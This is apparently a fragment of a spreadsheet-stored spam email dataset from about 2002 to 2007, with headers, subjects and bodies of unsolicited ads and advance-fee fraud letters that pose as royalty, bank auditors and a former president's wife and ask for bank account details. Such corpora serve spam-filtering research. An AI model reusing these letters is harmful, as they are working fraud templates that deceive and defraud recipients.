    <t>.BIZ and .INFO Available Here\n\nDear sir/madam,\n\nThe Internet Corporation for Assigned Names and Numbers [ICANN] has recently approved the addition of new extensions to the internet domain space. The new domain names will offer much-needed competition in the domain market. Consumers will be able to choose from the following new extensions: .biz, .info, and .name\n\nThe new top-level domain names are now available to the general public at the following address: [URL]http://www.interniconline.com[/URL] Priced at only $24.95, the best names are expected to be snapped up quickly so don't hesitate.\n\nSincerely,\n\nInternic Online\n[URL]http://www.interniconline.com[/URL]\n\n1202FFdi8-041VvDy1060QrFx3-446RpPn3326ChFp2-625zbFt8017TPMl55</t>
  </si>
  <si>
    <t>http://www.interniconline.com http://www.interniconline.com</t>
  </si>
  <si>
    <t>4860</t>
  </si>
  <si>
    <t>To: &lt;G18355@terra.com.do&gt;\nFrom: "Gracie" &lt;Arlean2462904@firemail.de&gt;\nDate: Thu, 16 May 2002 00:16:21 -1600</t>
  </si>
  <si>
    <t>Thu, 16 May 2002 00:16:21 -1600</t>
  </si>
  <si>
    <t>"Gracie" &lt;Arlean2462904@firemail.de&gt;</t>
  </si>
  <si>
    <t>&lt;G18355@terra.com.do&gt;</t>
  </si>
  <si>
    <t>Special Investor update.</t>
  </si>
  <si>
    <t>On January 1st 2002, the European countries began\nusing the new Euro Dollar.  Never before have so\nmany countries with such powerful economies united\nto use a single currency.  Get your piece of history\nnow!  We would like to send you a FREE Euro Dollar\nand a FREE report on world currency.  Just visit\nour site to request your Euro Dollar:\n\n[URL]http://www.new-opps4u.com[/URL]\n\nIn addition to our currency report, you can receive:\n\n*  FREE trading software for commodities and currencies\n*  FREE online trading advice via email\n*  FREE trading system for stock and commodity traders\n\nFind out how the new Euro Dollar will affect you.  If\nyou are over age 18 and have some risk capital, it's\nimportant that you find out how the Euro Dollar will\nchange the economic world. CLICK NOW!\n\n[URL]http://www.new-opps4u.com[/URL]\n\n\n$5,000 minimum investment\n\nPlease carefully evaluate your financial position before\ntrading.  Only risk capital should be used.\n\n\n[URL]http://www.new-opps4u.com[/URL] To OptOut</t>
  </si>
  <si>
    <t>http://www.new-opps4u.com http://www.new-opps4u.com http://www.new-opps4u.com</t>
  </si>
  <si>
    <t>1908</t>
  </si>
  <si>
    <t>To: princessfayad@worldmedic.com\nFrom: princess fayad &lt;princessfayad@indiatimes.com&gt;\nDate: Thu, 16 Mar 2006 05:34:38 +0700</t>
  </si>
  <si>
    <t>Thu, 16 Mar 2006 05:34:38 +0700</t>
  </si>
  <si>
    <t>princess fayad &lt;princessfayad@indiatimes.com&gt;</t>
  </si>
  <si>
    <t>princessfayad@worldmedic.com</t>
  </si>
  <si>
    <t>PRINCESS F.W BOLKIAH</t>
  </si>
  <si>
    <t>My dearest,\n\nWith due regard and respect, I am emailing you although its wrong to seek\nsuch assistance without prior knowledge of the person involved.  I hope I\nam not mistaking but I also believe that at the end of the day, you will\nnever betray I and my family on this project.\n\nI am Princess Fayad W. Bolkiah, the wife of Prince Jefri Bolkiah, former\nFinance Minister of Brunei, the tiny oil-rich sultanate on the Gulf\nIsland. I did not mean to amplify my extended royal family history, which\nhas already been disseminated by the international media during the\ncontroversial dispute that erupted between my husband and his stepbrother,\nthe sultan of Brunei; His Majesty Sultan Hassanal Bolkiah Mu'izzadin\nWaddaulah.\n\nAs you may know from the international media, the sultan; His Majesty\nSultan Hassanal Bolkiah Mu'izzadin Waddaulah had accused my husband of\nfinancial mismanagement and impropriety of US$76.8 million dollars. This\nwas as a result of the Asian financial crisis that made my husband's\ncompany Amedeo Development Company and government owned Brunei Investment\nCompany to be declared bankrupt during his tenure in office. However my\nhusband is in jail now, his bank accounts and private properties including\na crude oil export refinery have been confiscated by the sultanate.\n\nFurthermore, during this unfortunate period I was advised to evacuate my\nimmediate family outside the sultanate to avoid further prosecution from\nthe sultan and his security operatives, but luck ran against me on my\nattempt to escape. The Sultan now keeps me under house arrest and I have\nno access to a phone but I have a Palm V hand-held computer from which I\nam sending you this mail.\n\nBefore my In-castration, I was able to dispatch the sum of Fourteen\nMillion United States Dollars (US$14M) in cash under special arrangement\ninto the custody of a Private security and Trustee company for safe\nkeeping abroad. This action was on the orders of my husband to me to\nenable us start a new life. The money was packaged carefully into two and\nkept in trunks. Hence I seek your good assistance to retrieve this money\nand further invest into profitable investment in your country to\nfacilitate future survival for my family abroad. I have decided to offer\n20% of these funds to you as compensation for your strong cooperation.\n\nPlease I count on your absolute confidentiality, transparency and trust\nwhile looking forward to your prompt reply towards a swift conclusion of\nthis business transaction.\n\nMany Thanks &amp; May Allah blessing remain with you, Amen.\n\nI remain yours sincerely\n\nPrincess Fayad .W. Bolkiah\nBrunei.\n\n\n\n\n\n----------------------------------------------------------------------------------------------------------------\nลงชื่อรับซอฟแวร์ คลีนิก/ร้านยา ส่งฟรีถึงบ้าน ที่\n[URL]http://software.worldmedic.com[/URL]\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://software.worldmedic.com</t>
  </si>
  <si>
    <t>1365</t>
  </si>
  <si>
    <t>To: moh_yaya005@latinmail.com &lt;moh_yaya005@latinmail.com&gt;\nFrom: mohmed yaya &lt;moh_yaya005@latinmail.com&gt;\nDate: Thu, 16 Jun 2005 20:49:19 +0200</t>
  </si>
  <si>
    <t>Thu, 16 Jun 2005 20:49:19 +0200</t>
  </si>
  <si>
    <t>mohmed yaya &lt;moh_yaya005@latinmail.com&gt;</t>
  </si>
  <si>
    <t>moh_yaya005@latinmail.com &lt;moh_yaya005@latinmail.com&gt;</t>
  </si>
  <si>
    <t>AATENTION:CEO.</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.MOHMED YAYA.\nAUDITING AND ACCOUNTING MANAGER,\nAFRICA DEVELOPMENT BANK (ADB)\nOUAGADOUGOU-BURKINA FASO.\n\nDear Friend,\n\n\n\nI am the AUDITIING AND ACCOUNTING MANAGER AFRICA DEVELOPMENT BANK (ADB) here in Ouagadougou,Burkina Faso.In my department we discovered an abandoned sum of USD$15.5m(Fifteen million Five hundred thousand united states dollars).in an account that belongs to one of our foreign customer(MR.ARTHUR BILLINGS from AMERICA,USA)who died along with his entire family in Monday,31 July,2000,in a plane crash.FOR MORE INFORMATION VISIT THIS SITE BELOW:\n \n[URL]http://news.bbc.co.uk[/URL]\n\n\n\nSince we got information about his death, we have been expecting his \nnext of kin to come over and claim his money because we cannot release it unlessn some body applies for it as next of kin or relation to the deceased as indicated in our banking guidlings and laws but unfortunately we learnt that all his supposed next of kin or relation died alongside with him at the plane crash leaving nobody behind for the claim.\n\n\n\nIt is therefore upon this discovery that I now decided to make this businessproposal to you and release the money to you as the next of kin or relation to the deceased for safety and subsequent disbursement since nobody is coming for it and we don't want this money to go into the bank treasury as unclaimed bill.The banking law and guidline here stipulates that if such money remained unclaimed after fours years, the money will be transfered into the bank treasury as unclaimed fund.\n\n\n\nThe request of foreigner as next of kin in this business is occassioned by the fact that the customer was a foreigner and a Burkinabe cannot stand as next of kin to a foreigner.\nI agree that 30% of this money will be for you as a respect to the provision of a foriegn account , 10% will be set aside for expenses incurred during the business and 60% would be for me hereafter, I will visit your country for disbursement according to the percentage indicated Therefore, to enable the immediate transfer of this fund to you arranged,you must apply first to the bank as relation or next of kin of the deceased indicating your bank name, your bank account number, your private telephone and fax number for easy and effective communication and location where in the money will be remitted.Upon receipt of your reply, I will send to you by fax or email the text of application .\n\n\n\nI will not fail to bring to your notice this transaction is hitch-free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the transfer.\nYou should contact me immediately as soon as you receive this \nletter.Trusting to hear from you immediately.\nYours Faithfully,\n\nMR.MOHMED YAYA.\nMY PRIVATE TEL(00226 76 400 239.)\nAlternative email:moh_yaya002@yahoo.com\nURGENT BUSINESS TRANSACTION AND CONFIDENCIAL.\n \n\n\n¡Sé listo! Contrata el antivirus [URL]http://www.pandasoftware.es[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.pandasoftware.es</t>
  </si>
  <si>
    <t>59</t>
  </si>
  <si>
    <t>To:  resbob@al-islam.com &lt;resbob@al-islam.com&gt;\nFrom: res bob12 &lt;resbobi2@al-islam.com&gt;\nDate: Thu, 16 Jan 2003 18:47:42 -0800</t>
  </si>
  <si>
    <t>Thu, 16 Jan 2003 18:47:42 -0800</t>
  </si>
  <si>
    <t>res bob12 &lt;resbobi2@al-islam.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> resbob@al-islam.com &lt;resbob@al-islam.com&gt;</t>
  </si>
  <si>
    <t>FROM:Dopp Bob.PHONE:(874)-762864167, FAX  :(874)-762864168 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''         ; (URGENT AND CONFIDENTIAL) RE:  TRANSFER OF ($26,000.000.00 USD}        TWENTY SIX MILLION DOLLARS Dear Sir, We want to transfer to overseas account           ($26,000.000.00 USD) Twenty six million United States Dollars) from a Prime Bank here in South Africa, I want to ask you, If you are not capable to quietly look for a reliable and honest person who will be capable and fit to provide either an existing bank account or to set up a new Bank a/c immediately to receive this money, even an empty a/c can serve to receive this money, as long as you will remain honest to me till the end for this important business trusting in you and believing in God that you will never let me down either now or in future. I am the Auditor General of one of the prime bankshere in South Africa, during the course of our auditing,I discovered a floating fund in an account opened in the bank in 1996 and since 1998 nobody has operated on this account again,after going through some old files in the records I discovered that the owner of the account died without a [Heir/WILL] hence the money is floating and if I do not remit this moneyout urgently it will be forfeited for nothing. The owner of this account is PEDRO F. HASLER a foreigner, a great industrialist and he died since 1998.No otherperson knows about this account or any thing concerning it, the account has no other beneficiary and my investigation proved to me as well that until his death he was the manager GOLD ARK [pty]. SA. We will start the first transfer with Six million [$6,000.000] upon successful transaction without any disappoint from your side, we shall re-apply for thepayment of the remaining rest amount to your account. The total amount involve is Twenty six million United States Dollars only [$26,000.000.00]. I want to first transfer $6,000.000.00 [Six million United StatesDollar] from this money into a safe foreigners account abroad before the rest. But I don't know any foreigner, I am only contacting you as a foreigner because this money can not be approved to a local person here, without valid international foreignpassport, but can only be approved to any foreigner with valid international passport or drivers license and foreign a/c  because the money is in US dollars and the former owner of the a/c is a foreigner too, and the money can only be approved into foreign /c. However, we will sign a binding agreement, to bind us together when we meet face to face after the first transfer of $6 Million before transferring the second part of $20 Million. I am revealing this to you with believe in God that you will never let me down in this business, you are the first and the only person that I am contacting for this business, so please reply urgently so that I will inform you the next step to take urgently. Send also your private telephone and fax number including the full details of the account to be used for the deposit. I want us to meet face to face to build confidence and to sign a binding agreement that will bind us together immediately after the first transfer before we fly toyour country for withdrawal, sharing and investments. I need your full co-operation to make this work fine because the management is ready to approve this payment to any foreigner who has correct informationof this account, which I will give to you upon your positive response and once I am convinced that you are capable and will meet up with instruction of  a keybank official who is deeply involved with me in this business. I need your strong assurance that you will never, never let me down. With my influence and my position in the bank the bank official can transfer this money to any foreigner's reliable account that you can provide with assurancethat this money will be intact pending our physical arrival in your country for sharing. The bank official Will destroy all documents of transaction immediatelywe receive this money leaving no trace to any place and to build confidence you can call me for heart to heart discussion through my private satellite phonewhich I secured for the security and safety of this business as you know that this business is confidential.I will use my position and influence to obtain all legal approvals for onward transfer of this money to your account with appropriate clearance from the relevant ministries and foreign exchangedepartments. At the conclusion of this business, you will be given 35% of the total amount, 60% will be for me, while 5% will be for expenses both parties might have incurredduring the process of transferring. I look forward to your earliest reply through my emailaddress. Yours trulyDopp Bob   Get Your Free Email at [URL]www.al-islam.com[/URL]</t>
  </si>
  <si>
    <t>www.al-islam.com</t>
  </si>
  <si>
    <t>56</t>
  </si>
  <si>
    <t>To: judeestrada2@dmailman.com\nFrom: judeestrada &lt;judeestrada2@dmailman.com&gt;\nDate: Thu, 16 Jan 2003 09:03:50 -0500</t>
  </si>
  <si>
    <t>Thu, 16 Jan 2003 09:03:50 -0500</t>
  </si>
  <si>
    <t>judeestrada &lt;judeestrada2@dmailman.com&gt;</t>
  </si>
  <si>
    <t>judeestrada2@dmailman.com</t>
  </si>
  <si>
    <t>ESTRADA</t>
  </si>
  <si>
    <t>\n\nI am Dr Luisa Pimentel Estrada, the wife of Joseph Ejercito Estrada,former president of Philippines. I have children with my husband Jose, Jacqueline and Jude.Two sons and a daugther.This mail may be coming to you as a surprise or an article but it is very real.\n\nI gave the mail to my daugther Jude to send the mail to any contacts she sees and may be a God fearing person will listen to our plight.I will want you as the receiver to read through it and think very well if you can help or render us any assistance. My husband Joseph Ejercito estrada was elected as the 13th President of the Philippines in May 1998 by the people of Philippines due to his popularity in the film industry made him to win the largest popularity in the history of election in Philippines.He has attain the position of Senate in 1987,then vice-president in May 1992 and later become the president 1998.My husband became mayor of his hometown, San Juan in 1969 but it was 1972 that he had a string of public successes. My husband was named one of the ten Outstanding Young Men in Public Administration. He was also named Most Outstanding Mayor and Foremost Nationalist and Most Outstanding Metro Manila Mayor.\n\n My husband is recently accused of illegal acquire some four Billion Peso ($80M) during his 31 months in office as President backed up by an uprising of mass Demonstrators and Senate Traitors. They also said that he has skimmed off tobacco excise Taxes benefitting from government business deals.Most of them benefitted from my husband's generousity when he was in office. But they just turned around to be the ones to impeach him. I have tried every possible means to get him out of Detention without success. The Despotic forces in power appear bent in deriding him, rubbishing his achievements while freezing all his known Bank accounts.He has been accused of economic plunder carrying the maximum penalty of death. To the worst of it all,all other wives of my husband especailly Guia Gomez and some of his children born outside wedlock are testifying against us.In conjunction with the PCGG funded by the recent President Arroyo Macapagal Gloria. These are some of the allegations file!\n before my husband in the impeachment trial; \n\n1. Gov. Luis Singson, a longtime friend of my husband, said he provided the my husband with more than $8 million in payoffs from illegal gambling and $2.7 million from tobacco taxes. \n\n2. Witnesses testify one of an account in the Philippines third largest bank held millions of dollars in bribes collected by my husband. Equitable PCI Bank President George Go resigns. The banks senior vice president, Clarissa Ocampo, said she saw my husband sign a false name to documents withdrawing $10 million from a secret personal account. \n\n3. On Dec 31 Five synchronized bomb attacks kill 22 people and injure more than 120 in Manila, days before the trial is to return from holiday recess. Police accuse Muslim rebels but many fear the bombs may be linked to the trial. \n\n\n4. That my husband received about $8.5 million in pay-offs from illegal gambling operators. 5. That my husband participated in a real estate business controlled by me and my son Jose despite a prohibition on outside business interests while in office. My husband is suffering from bronchitis and emphysema right now and he detained at the Veterans Memorial Medical Center in Quezon City in hospital prison outside Manila where the life of my husband is in danger.I will let you know that it is political motivated by Gloria Arroyo.Meanwhile,the government has said that it may drop rebellion charges against my husband allies Senator Juan Ponce Enrile and the former ambassador to the United State Ernesto Maceda because they were in the side of my husband,both men were later jailed by the government of Gloria Arroyo that they instigated a march on the presidential palace by 50,000 supporters of my husband.These are all political.All these are done to have my husband death. Presently !\nlife has not been easy for my children and I,my travelling documents have been seized by the government and they restricted me and my children to have access to my husband.\n\n Haven seen the way things are going with us.He decided to let me know that he deposited some money with Bank in Europe.He said that he deposited the sum of twenty Million dollars $20,000,000 in Banesto Bank Valencia Spain.Now I want to start a new life with the money.I want to invest the money outside Philippines. What I am begging you is to assist me in receiving the money on my behalf. I have discussed with the lawyer here in Metropolitan Manila and the chairman of the International Credit Commission in Madrid about this arrangement,they assured me that the money will be release to my representative.In that regards,I have gone to collect the documents needed from Gomez Carlos who my husband kept the documents with. If you are willing to assist me in receiving the money.You will send me your full names,contact Fax and Telephone numbers to enable me forward your informations to the appropriate offices. Once you get back to me,we will discuss your fee/commission you will lik!\nen to take for receiving the fund in your account.Thereafter we will enter into a revocable trust agreement appointing you as the trustee to the trust fund.\n\n I will be communicating with you by email because my telephone lines are not safe for the transaction because of the heighten security around me and my family. I would want us to be in partnership in any good business you may suggest in your country. Please handle this transaction with maturity and sincerity. Best Regards,\n\n Dr Luisa Pimental Estrada \n\nNB:Please note this send all email conresspondence to this email address {judeestrada1@epatra.com}OR{joseestrada1@epatra.com}\n\n__________________________________________________________\nGet your Private, Free Email from HTTP://[URL]www.DmailMan.Com[/URL]\n\n</t>
  </si>
  <si>
    <t>www.DmailMan.Com</t>
  </si>
  <si>
    <t>1792</t>
  </si>
  <si>
    <t>To: nan\nFrom: sanko junior &lt;juniorsanko64@hotmail.com&gt;\nDate: Thu, 16 Feb 2006 02:35:57 +0000</t>
  </si>
  <si>
    <t>Thu, 16 Feb 2006 02:35:57 +0000</t>
  </si>
  <si>
    <t>sanko junior &lt;juniorsanko64@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">FROM RICHARD </t>
  </si>
  <si>
    <t>FROM RICHARD AND Janet\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET\nFROM RICHARD AND JANET.\ncontact me on .richard64sanko@yahoo.it\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET Please reply me via\nrichard64sanko@yahoo.itFROM RICHARD AND Janet\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET\nFROM RICHARD AND JANET.\ncontact me on .richard64sanko@yahoo.it\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET Please reply me via\nrichard64sanko@yahoo.itFROM RICHARD AND Janet\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET\nFROM RICHARD AND JANET.\ncontact me on .richard64sanko@yahoo.it\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET Please reply me via\nrichard64sanko@yahoo.itFROM RICHARD AND Janet\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET\nFROM RICHARD AND JANET.\ncontact me on .richard64sanko@yahoo.it\nDear sir,\n\nI am Sanko Richard the only son of late former Director of finance,  Dr \nJohnson Sanko of Sierra-Leone diamond and mining corporation.\n\nI must confess my agitation is real, and my words is my bond, in this \nproposal.\n\nMy late father diverted this money meant for purchase of ammunition, for my \ncountry, during the peak of disastrous civil war in my country, now he has \ndeposited the money with BANK here in Abidjan, where I am residing under \npolitical Assylum with my younger sister Janeth.\n\nFor you to assist me transfer this money in your private bank account, the \nsaid amount is twenty four million United States dollars. I am compensating \nyou with 15% of the total money amount,now all my hope is banked on you and \nI really wants to invest this money in your country, were their is stability\nof Government,political and economic welfare.\n\nHonestly I want you to believe that this transaction is real and never a \njoke. My late father Dr johnso n sanko gave me the deposit slip issued to \nhim by the Bank on the date of deposit, for you to be clarify because, I do \nnot expose my self to anybody I see, I believe that you are able to keep \nthis transaction secret for me because this money is the hope of my life,it \nis important.\n\nPlease write me immediately after you must have gone through my message fill \nfree and make it urgent. That is the reason why I offered you 15% of the \ntotal money amount, and in case of any other necessary expenses you might \nincure, I am resolving to give you an addition of 5% during this \ntransaction.\n\nN.B Try and negotiate for me some profitable blue chip investment \nopportunities which is risky free which I can invest with this money when it \nis transferred to your account, personally I am interested in estate \nmanagement and hotel business, please advise me.\n\nAnd promise me and my younger sister to be our guardian considering our \nsituation and not to betray us.\n\n\nPlease we waiting to hear from you.\nthanks and God bless you.\nYours truly,\nRichard AND JANET Please reply me via\nrichard64sanko@yahoo.it\n\n_________________________________________________________________\nMSN Hotmail : créez votre adresse e-mail gratuite &amp; à vie ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3278</t>
  </si>
  <si>
    <t>To: gosolanges@latinmail.com &lt;gosolanges@latinmail.com&gt;\nFrom: GOBLOUSO SOLANGE &lt;gosolanges@latinmail.com&gt;\nDate: Thu, 16 Aug 2007 22:21:21 +0200</t>
  </si>
  <si>
    <t>Thu, 16 Aug 2007 22:21:21 +0200</t>
  </si>
  <si>
    <t>GOBLOUSO SOLANGE &lt;gosolanges@latinmail.com&gt;</t>
  </si>
  <si>
    <t>gosolanges@latinmail.com &lt;gosolanges@latinmail.com&gt;</t>
  </si>
  <si>
    <t>confidentiel</t>
  </si>
  <si>
